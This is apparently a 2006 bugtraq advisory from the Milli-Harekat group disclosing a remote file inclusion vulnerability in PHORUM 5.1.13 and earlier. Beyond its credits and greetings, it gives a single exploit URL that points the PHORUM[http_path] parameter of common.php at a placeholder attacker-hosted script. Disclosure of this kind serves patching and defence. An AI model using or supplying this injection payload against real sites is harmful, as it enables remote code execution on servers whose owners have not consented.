
Date: 11 Jun 2006 01:47:47 -0000
From: erne@...ealizm.com
To: bugtraq@...urityfocus.com
Subject: # MHG Security Team --- PHORUM 5.1.13 Remote File Inc.


# Milli-Harekat Advisory ( www.milli-harekat.org )

# PHORUM <= 5.1.13 - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : PHORUM 5.1.13

# Credits : ERNE

# Thanks : Dj_Remix,The_Bekir,Liz0zim,Eskobar,SpC-x,3n7r1k4 and ALL MHG USERS

# Vulnerable :

http://www.site.com/[phorum_path]/common.php?PHORUM[http_path]=[evil_scripts]


